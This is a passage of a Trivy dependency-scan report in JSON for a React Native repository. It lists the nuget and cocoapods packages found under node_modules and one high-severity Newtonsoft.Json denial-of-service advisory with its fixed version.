{ "SchemaVersion": 2, "Trivy": { "Version": "0.70.0" }, "ReportID": "019dd7f5-d831-7495-b12b-161a0b9880c9", "CreatedAt": "2026-04-29T06:38:26.353303227Z", "ArtifactID": "sha256:83118b6a5e1f8ba83a75c6503b5586e4e1f437b6fb58f9643077c2e420e9b407", "ArtifactName": "/home/azureuser/performics_main", "ArtifactType": "repository", "Metadata": { "RepoURL": "https://git.parinaam.in/bunty/performics_main.git", "Branch": "main", "Commit": "a4c826246ec9a52393caa3474bf191f667f72682", "CommitMsg": "change fix", "Author": "anitak \u003canita.kardam@cpmindia.com\u003e", "Committer": "anitak \u003canita.kardam@cpmindia.com\u003e" }, "Results": [ { "Target": "node_modules/@react-native-async-storage/async-storage/windows/ReactNativeAsyncStorage/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "fd7f611d158b0a3e" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-async-storage/async-storage/windows/ReactNativeAsyncStorage61/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.190730.2", "UID": "d924123dec86979c" }, "Version": "2.0.190730.2", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-clipboard/clipboard/windows/Clipboard/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "b3d8c497f9dc7f9e" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-community/checkbox/ios/Podfile.lock", "Class": "lang-pkgs", "Type": "cocoapods", "Packages": [ { "ID": "BEMCheckBox@1.4.1", "Name": "BEMCheckBox", "Identifier": { "PURL": "pkg:cocoapods/BEMCheckBox@1.4.1", "UID": "4fab759a82185d9b" }, "Version": "1.4.1", "AnalyzedBy": "cocoapods" } ] }, { "Target": "node_modules/@react-native-community/checkbox/windows/CheckboxWindows/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "717dd530739193e7" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-community/datetimepicker/windows/DateTimePickerWindows/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "53d5bcd438a5991d" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-community/netinfo/windows/RNCNetInfoCPP/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", "UID": "162b18d28bdd1ea9" }, "Version": "2.0.210312.4", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-community/slider/windows/SliderWindows/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "4d8188a1663aa607" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-community/slider/windows/SliderWindows/packages.lock.json", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "ID": "Microsoft.UI.Xaml@2.8.0", "Name": "Microsoft.UI.Xaml", "Identifier": { "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.8.0", "UID": "71e6b1080a2f8c22" }, "Version": "2.8.0", "Relationship": "direct", "DependsOn": [ "Microsoft.Web.WebView2@1.0.1264.42" ], "Locations": [ { "StartLine": 5, "EndLine": 13 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", "UID": "c2629277c3747e7" }, "Version": "2.0.230706.1", "Relationship": "direct", "Locations": [ { "StartLine": 14, "EndLine": 19 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.JavaScript.Hermes@0.1.23", "Name": "Microsoft.JavaScript.Hermes", "Identifier": { "PURL": "pkg:nuget/Microsoft.JavaScript.Hermes@0.1.23", "UID": "77418eb3d2820da3" }, "Version": "0.1.23", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 25, "EndLine": 29 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Web.WebView2@1.0.1264.42", "Name": "Microsoft.Web.WebView2", "Identifier": { "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.1264.42", "UID": "c042a295d658947" }, "Version": "1.0.1264.42", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 30, "EndLine": 34 }, { "StartLine": 71, "EndLine": 75 }, { "StartLine": 78, "EndLine": 82 }, { "StartLine": 85, "EndLine": 89 }, { "StartLine": 92, "EndLine": 96 }, { "StartLine": 99, "EndLine": 103 }, { "StartLine": 106, "EndLine": 110 }, { "StartLine": 113, "EndLine": 117 } ], "AnalyzedBy": "nuget" }, { "ID": "boost@1.83.0", "Name": "boost", "Identifier": { "PURL": "pkg:nuget/boost@1.83.0", "UID": "3f63a4b686c400fb" }, "Version": "1.83.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20, "EndLine": 24 } ], "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/@react-native-picker/picker/windows/ReactNativePicker/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.UI.Xaml", "Identifier": { "PURL": "pkg:nuget/Microsoft.UI.Xaml@2.3.191129002", "UID": "db8275fe292c5d3b" }, "Version": "2.3.191129002", "AnalyzedBy": "nuget" }, { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", "UID": "c452b94ed875d6f6" }, "Version": "2.0.210312.4", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-blob-util/windows/ReactNativeBlobUtil/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200615.7", "UID": "37845974296c7778" }, "Version": "2.0.200615.7", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-blob-util/windows/ReactNativeBlobUtil/packages.lock.json", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "ID": "Microsoft.ReactNative@0.76.13-Fabric", "Name": "Microsoft.ReactNative", "Identifier": { "PURL": "pkg:nuget/Microsoft.ReactNative@0.76.13-Fabric", "UID": "cc6372bfd09d2c22" }, "Version": "0.76.13-Fabric", "Relationship": "direct", "Locations": [ { "StartLine": 11, "EndLine": 16 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.ReactNative.Cxx@0.76.13-Fabric", "Name": "Microsoft.ReactNative.Cxx", "Identifier": { "PURL": "pkg:nuget/Microsoft.ReactNative.Cxx@0.76.13-Fabric", "UID": "d474c554a5fb05f9" }, "Version": "0.76.13-Fabric", "Relationship": "direct", "DependsOn": [ "Microsoft.ReactNative@0.76.13-Fabric" ], "Locations": [ { "StartLine": 17, "EndLine": 25 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.VCRTForwarders.140@1.0.2-rc", "Name": "Microsoft.VCRTForwarders.140", "Identifier": { "PURL": "pkg:nuget/Microsoft.VCRTForwarders.140@1.0.2-rc", "UID": "7f2de1e942193975" }, "Version": "1.0.2-rc", "Relationship": "direct", "Locations": [ { "StartLine": 26, "EndLine": 31 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.CppWinRT@2.0.230706.1", "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.230706.1", "UID": "efa85b45465745b1" }, "Version": "2.0.230706.1", "Relationship": "direct", "Locations": [ { "StartLine": 32, "EndLine": 37 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.WindowsAppSDK@1.7.250401001", "Name": "Microsoft.WindowsAppSDK", "Identifier": { "PURL": "pkg:nuget/Microsoft.WindowsAppSDK@1.7.250401001", "UID": "b938986aaaf2e36e" }, "Version": "1.7.250401001", "Relationship": "direct", "DependsOn": [ "Microsoft.Web.WebView2@1.0.2903.40", "Microsoft.Windows.SDK.BuildTools@10.0.22621.756" ], "Locations": [ { "StartLine": 38, "EndLine": 47 } ], "AnalyzedBy": "nuget" }, { "ID": "boost@1.83.0", "Name": "boost", "Identifier": { "PURL": "pkg:nuget/boost@1.83.0", "UID": "6bf8207fe0586f70" }, "Version": "1.83.0", "Relationship": "direct", "Locations": [ { "StartLine": 5, "EndLine": 10 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Web.WebView2@1.0.2903.40", "Name": "Microsoft.Web.WebView2", "Identifier": { "PURL": "pkg:nuget/Microsoft.Web.WebView2@1.0.2903.40", "UID": "922ece54230fa40b" }, "Version": "1.0.2903.40", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 48, "EndLine": 52 } ], "AnalyzedBy": "nuget" }, { "ID": "Microsoft.Windows.SDK.BuildTools@10.0.22621.756", "Name": "Microsoft.Windows.SDK.BuildTools", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.SDK.BuildTools@10.0.22621.756", "UID": "d8b6f5197f744156" }, "Version": "10.0.22621.756", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 53, "EndLine": 57 } ], "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-device-info/windows/RNDeviceInfoCPP/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.210312.4", "UID": "b51e8a92b9c33ce" }, "Version": "2.0.210312.4", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-fs/windows/RNFS.Net46/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Newtonsoft.Json", "Identifier": { "PURL": "pkg:nuget/Newtonsoft.Json@10.0.3", "UID": "95404bb7acc2ec78" }, "Version": "10.0.3", "AnalyzedBy": "nuget" }, { "Name": "Syroot.Windows.IO.KnownFolders", "Identifier": { "PURL": "pkg:nuget/Syroot.Windows.IO.KnownFolders@1.2.1", "UID": "2f78fe9d903d5246" }, "Version": "1.2.1", "AnalyzedBy": "nuget" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2024-21907", "VendorIDs": [ "GHSA-5crp-9r3c-p9vr" ], "PkgName": "Newtonsoft.Json", "PkgIdentifier": { "PURL": "pkg:nuget/Newtonsoft.Json@10.0.3", "UID": "95404bb7acc2ec78" }, "InstalledVersion": "10.0.3", "FixedVersion": "13.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-21907", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory NuGet", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anuget" }, "Fingerprint": "sha256:3a37a559f391dddad67fb1371ccdb67acd0fb14989aa3ecbf46cab9c1cff81b1", "Title": "Improper Handling of Exceptional Conditions in Newtonsoft.Json", "Description": "Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial of service condition.", "Severity": "HIGH", "CweIDs": [ "CWE-755" ], "VendorSeverity": { "ghsa": 3, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://alephsecurity.com/2018/10/22/StackOverflowException", "https://alephsecurity.com/2018/10/22/StackOverflowException/", "https://alephsecurity.com/vulns/aleph-2018004", "https://github.com/JamesNK/Newtonsoft.Json", "https://github.com/JamesNK/Newtonsoft.Json/commit/7e77bbe1beccceac4fc7b174b53abfefac278b66", "https://github.com/JamesNK/Newtonsoft.Json/issues/2457", "https://github.com/JamesNK/Newtonsoft.Json/pull/2462", "https://github.com/advisories/GHSA-5crp-9r3c-p9vr", "https://security.snyk.io/vuln/SNYK-DOTNET-NEWTONSOFTJSON-2774678", "https://vulncheck.com/advisories/vc-advisory-GHSA-5crp-9r3c-p9vr" ], "PublishedDate": "2024-01-03T16:15:08.793Z", "LastModifiedDate": "2025-11-28T23:15:47.937Z" } ] }, { "Target": "node_modules/react-native-gif/ios/RNFLAnimatedImage/Podfile.lock", "Class": "lang-pkgs", "Type": "cocoapods", "Packages": [ { "ID": "FLAnimatedImage@1.0.14", "Name": "FLAnimatedImage", "Identifier": { "PURL": "pkg:cocoapods/FLAnimatedImage@1.0.14", "UID": "5139c8e5cb6eebd2" }, "Version": "1.0.14", "AnalyzedBy": "cocoapods" } ] }, { "Target": "node_modules/react-native-linear-gradient/windows/BVLinearGradient/BVLinearGradient/packages.config", "Class": "lang-pkgs", "Type": "nuget", "Packages": [ { "Name": "Microsoft.Windows.CppWinRT", "Identifier": { "PURL": "pkg:nuget/Microsoft.Windows.CppWinRT@2.0.200316.3", "UID": "2838d80e889c9868" }, "Version": "2.0.200316.3", "AnalyzedBy": "nuget" } ] }, { "Target": "node_modules/react-native-orientation-locker/example/ios/Podfile.lock", "Class": "lang-pkgs", "Type": "cocoapods", "Packages": [ { "ID": "CocoaAsyncSocket@7.6.4", "Name": "CocoaAsyncSocket", "Identifier": { "PURL": "pkg:cocoapods/CocoaAsyncSocket@7.6.4", "UID": "88f4b479427ed0ed" }, "Version": "7.6.4", "AnalyzedBy": "cocoapods" }, { "ID": "CocoaLibEvent@1.0.0", "Name": "CocoaLibEvent", "Identifier": { "PURL": "pkg:cocoapods/CocoaLibEvent@1.0.0", "UID": "d43da57eb59a556d" }, "Version": "1.0.0", "AnalyzedBy": "cocoapods" }, { "ID": "DoubleConversion@1.1.6", "Name": "DoubleConversion", "Identifier": { "PURL": "pkg:cocoapods/DoubleConversion@1.1.6", "UID": "303e8bead94443a3" }, "Version": "1.1.6", "AnalyzedBy": "cocoapods" }, { "ID": "FBLazyVector@0.63.2", "Name": "FBLazyVector", "Identifier": { "PURL": "pkg:cocoapods/FBLazyVector@0.63.2", "UID": "f81bee5811420c07" }, "Version": "0.63.2", "AnalyzedBy": "cocoapods" }, { "ID": "FBReactNativeSpec@0.63.2", "Name": "FBReactNativeSpec", "Identifier": { "PURL": "pkg:cocoapods/FBReactNativeSpec@0.63.2", "UID": "5e1a286816a7f779" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "RCTRequired@0.63.2", "RCTTypeSafety@0.63.2", "React-Core@0.63.2", "React-jsi@0.63.2", "ReactCommon/turbomodule/core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "Flipper@0.41.5", "Name": "Flipper", "Identifier": { "PURL": "pkg:cocoapods/Flipper@0.41.5", "UID": "1a5c582e899d9569" }, "Version": "0.41.5", "DependsOn": [ "Flipper-Folly@2.2.0", "Flipper-RSocket@1.1.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "Flipper-DoubleConversion@1.1.7", "Name": "Flipper-DoubleConversion", "Identifier": { "PURL": "pkg:cocoapods/Flipper-DoubleConversion@1.1.7", "UID": "49e35caaa3d46a38" }, "Version": "1.1.7", "AnalyzedBy": "cocoapods" }, { "ID": "Flipper-Folly@2.2.0", "Name": "Flipper-Folly", "Identifier": { "PURL": "pkg:cocoapods/Flipper-Folly@2.2.0", "UID": "5d0b8f0be255b001" }, "Version": "2.2.0", "DependsOn": [ "boost-for-react-native@1.63.0", "CocoaLibEvent@1.0.0", "Flipper-DoubleConversion@1.1.7", "Flipper-Glog@0.3.6", "OpenSSL-Universal@1.0.2.19" ], "AnalyzedBy": "cocoapods" }, { "ID": "Flipper-Glog@0.3.6", "Name": "Flipper-Glog", "Identifier": { "PURL": "pkg:cocoapods/Flipper-Glog@0.3.6", "UID": "6c5615e8942962f7" }, "Version": "0.3.6", "AnalyzedBy": "cocoapods" }, { "ID": "Flipper-PeerTalk@0.0.4", "Name": "Flipper-PeerTalk", "Identifier": { "PURL": "pkg:cocoapods/Flipper-PeerTalk@0.0.4", "UID": "f61fe2959706cc69" }, "Version": "0.0.4", "AnalyzedBy": "cocoapods" }, { "ID": "Flipper-RSocket@1.1.0", "Name": "Flipper-RSocket", "Identifier": { "PURL": "pkg:cocoapods/Flipper-RSocket@1.1.0", "UID": "788a71a69e9f2319" }, "Version": "1.1.0", "DependsOn": [ "Flipper-Folly@2.2.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit@0.41.5", "Name": "FlipperKit", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5", "UID": "9aae177bcca7d4ac" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/Core@0.41.5", "Name": "FlipperKit/Core", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#Core", "UID": "2593a5c058e9d60e" }, "Version": "0.41.5", "DependsOn": [ "Flipper@0.41.5", "FlipperKit/CppBridge@0.41.5", "FlipperKit/FBCxxFollyDynamicConvert@0.41.5", "FlipperKit/FBDefines@0.41.5", "FlipperKit/FKPortForwarding@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/CppBridge@0.41.5", "Name": "FlipperKit/CppBridge", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#CppBridge", "UID": "f169bd9d6afc9801" }, "Version": "0.41.5", "DependsOn": [ "Flipper@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FBCxxFollyDynamicConvert@0.41.5", "Name": "FlipperKit/FBCxxFollyDynamicConvert", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FBCxxFollyDynamicConvert", "UID": "fac54c27ea640850" }, "Version": "0.41.5", "DependsOn": [ "Flipper-Folly@2.2.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FBDefines@0.41.5", "Name": "FlipperKit/FBDefines", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FBDefines", "UID": "adadc124a0a1cec8" }, "Version": "0.41.5", "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FKPortForwarding@0.41.5", "Name": "FlipperKit/FKPortForwarding", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FKPortForwarding", "UID": "a1da406881b7c1a7" }, "Version": "0.41.5", "DependsOn": [ "CocoaAsyncSocket@7.6.4", "Flipper-PeerTalk@0.0.4" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitHighlightOverlay@0.41.5", "Name": "FlipperKit/FlipperKitHighlightOverlay", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitHighlightOverlay", "UID": "52dee0a82cb0c4a" }, "Version": "0.41.5", "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitLayoutPlugin@0.41.5", "Name": "FlipperKit/FlipperKitLayoutPlugin", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitLayoutPlugin", "UID": "cd13064fd4d0c0bc" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5", "FlipperKit/FlipperKitHighlightOverlay@0.41.5", "FlipperKit/FlipperKitLayoutTextSearchable@0.41.5", "YogaKit@1.18.1" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitLayoutTextSearchable@0.41.5", "Name": "FlipperKit/FlipperKitLayoutTextSearchable", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitLayoutTextSearchable", "UID": "18604e7de92da30d" }, "Version": "0.41.5", "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitNetworkPlugin@0.41.5", "Name": "FlipperKit/FlipperKitNetworkPlugin", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitNetworkPlugin", "UID": "25965d4ad795bf8a" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitReactPlugin@0.41.5", "Name": "FlipperKit/FlipperKitReactPlugin", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitReactPlugin", "UID": "3964fcfd1227a8e" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/FlipperKitUserDefaultsPlugin@0.41.5", "Name": "FlipperKit/FlipperKitUserDefaultsPlugin", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#FlipperKitUserDefaultsPlugin", "UID": "42fa3d46d6f06993" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "FlipperKit/SKIOSNetworkPlugin@0.41.5", "Name": "FlipperKit/SKIOSNetworkPlugin", "Identifier": { "PURL": "pkg:cocoapods/FlipperKit@0.41.5#SKIOSNetworkPlugin", "UID": "d0ceaa4bb584caba" }, "Version": "0.41.5", "DependsOn": [ "FlipperKit/Core@0.41.5", "FlipperKit/FlipperKitNetworkPlugin@0.41.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "Folly@2020.01.13.00", "Name": "Folly", "Identifier": { "PURL": "pkg:cocoapods/Folly@2020.01.13.00", "UID": "927129f1e3a2eaa6" }, "Version": "2020.01.13.00", "DependsOn": [ "boost-for-react-native@1.63.0", "DoubleConversion@1.1.6", "Folly/Default@2020.01.13.00", "glog@0.3.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "Folly/Default@2020.01.13.00", "Name": "Folly/Default", "Identifier": { "PURL": "pkg:cocoapods/Folly@2020.01.13.00#Default", "UID": "6e9df06d5f358183" }, "Version": "2020.01.13.00", "DependsOn": [ "boost-for-react-native@1.63.0", "DoubleConversion@1.1.6", "glog@0.3.5" ], "AnalyzedBy": "cocoapods" }, { "ID": "OpenSSL-Universal@1.0.2.19", "Name": "OpenSSL-Universal", "Identifier": { "PURL": "pkg:cocoapods/OpenSSL-Universal@1.0.2.19", "UID": "a3c6f45406425cb7" }, "Version": "1.0.2.19", "DependsOn": [ "OpenSSL-Universal/Static@1.0.2.19" ], "AnalyzedBy": "cocoapods" }, { "ID": "OpenSSL-Universal/Static@1.0.2.19", "Name": "OpenSSL-Universal/Static", "Identifier": { "PURL": "pkg:cocoapods/OpenSSL-Universal@1.0.2.19#Static", "UID": "788ed1e2f5444f54" }, "Version": "1.0.2.19", "AnalyzedBy": "cocoapods" }, { "ID": "RCTRequired@0.63.2", "Name": "RCTRequired", "Identifier": { "PURL": "pkg:cocoapods/RCTRequired@0.63.2", "UID": "567b8a6549e77b82" }, "Version": "0.63.2", "AnalyzedBy": "cocoapods" }, { "ID": "RCTTypeSafety@0.63.2", "Name": "RCTTypeSafety", "Identifier": { "PURL": "pkg:cocoapods/RCTTypeSafety@0.63.2", "UID": "9c0dc8ab81f02b51" }, "Version": "0.63.2", "DependsOn": [ "FBLazyVector@0.63.2", "Folly@2020.01.13.00", "RCTRequired@0.63.2", "React-Core@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React@0.63.2", "Name": "React", "Identifier": { "PURL": "pkg:cocoapods/React@0.63.2", "UID": "c5a749dcd93c4258" }, "Version": "0.63.2", "DependsOn": [ "React-Core@0.63.2", "React-Core/DevSupport@0.63.2", "React-Core/RCTWebSocket@0.63.2", "React-RCTActionSheet@0.63.2", "React-RCTAnimation@0.63.2", "React-RCTBlob@0.63.2", "React-RCTImage@0.63.2", "React-RCTLinking@0.63.2", "React-RCTNetwork@0.63.2", "React-RCTSettings@0.63.2", "React-RCTText@0.63.2", "React-RCTVibration@0.63.2" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core@0.63.2", "Name": "React-Core", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2", "UID": "7f7a03527e4b194" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/CoreModulesHeaders@0.63.2", "Name": "React-Core/CoreModulesHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#CoreModulesHeaders", "UID": "cbc638469e10b040" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/Default@0.63.2", "Name": "React-Core/Default", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#Default", "UID": "f1d42cd68856a81c" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/DevSupport@0.63.2", "Name": "React-Core/DevSupport", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#DevSupport", "UID": "3870587e0712a35e" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-Core/RCTWebSocket@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "React-jsinspector@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTActionSheetHeaders@0.63.2", "Name": "React-Core/RCTActionSheetHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTActionSheetHeaders", "UID": "b5cac816550d045a" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTAnimationHeaders@0.63.2", "Name": "React-Core/RCTAnimationHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTAnimationHeaders", "UID": "da2dfddb50ff7b30" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTBlobHeaders@0.63.2", "Name": "React-Core/RCTBlobHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTBlobHeaders", "UID": "8463db51201d8143" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTImageHeaders@0.63.2", "Name": "React-Core/RCTImageHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTImageHeaders", "UID": "b9c843ac665495da" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTLinkingHeaders@0.63.2", "Name": "React-Core/RCTLinkingHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTLinkingHeaders", "UID": "a5b28c3cbcfdb42f" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", "React-cxxreact@0.63.2", "React-jsi@0.63.2", "React-jsiexecutor@0.63.2", "Yoga@1.14.0" ], "AnalyzedBy": "cocoapods" }, { "ID": "React-Core/RCTNetworkHeaders@0.63.2", "Name": "React-Core/RCTNetworkHeaders", "Identifier": { "PURL": "pkg:cocoapods/React-Core@0.63.2#RCTNetworkHeaders", "UID": "fd2cb5c3f34bf1f8" }, "Version": "0.63.2", "DependsOn": [ "Folly@2020.01.13.00", "glog@0.3.5", "React-Core/Default@0.63.2", 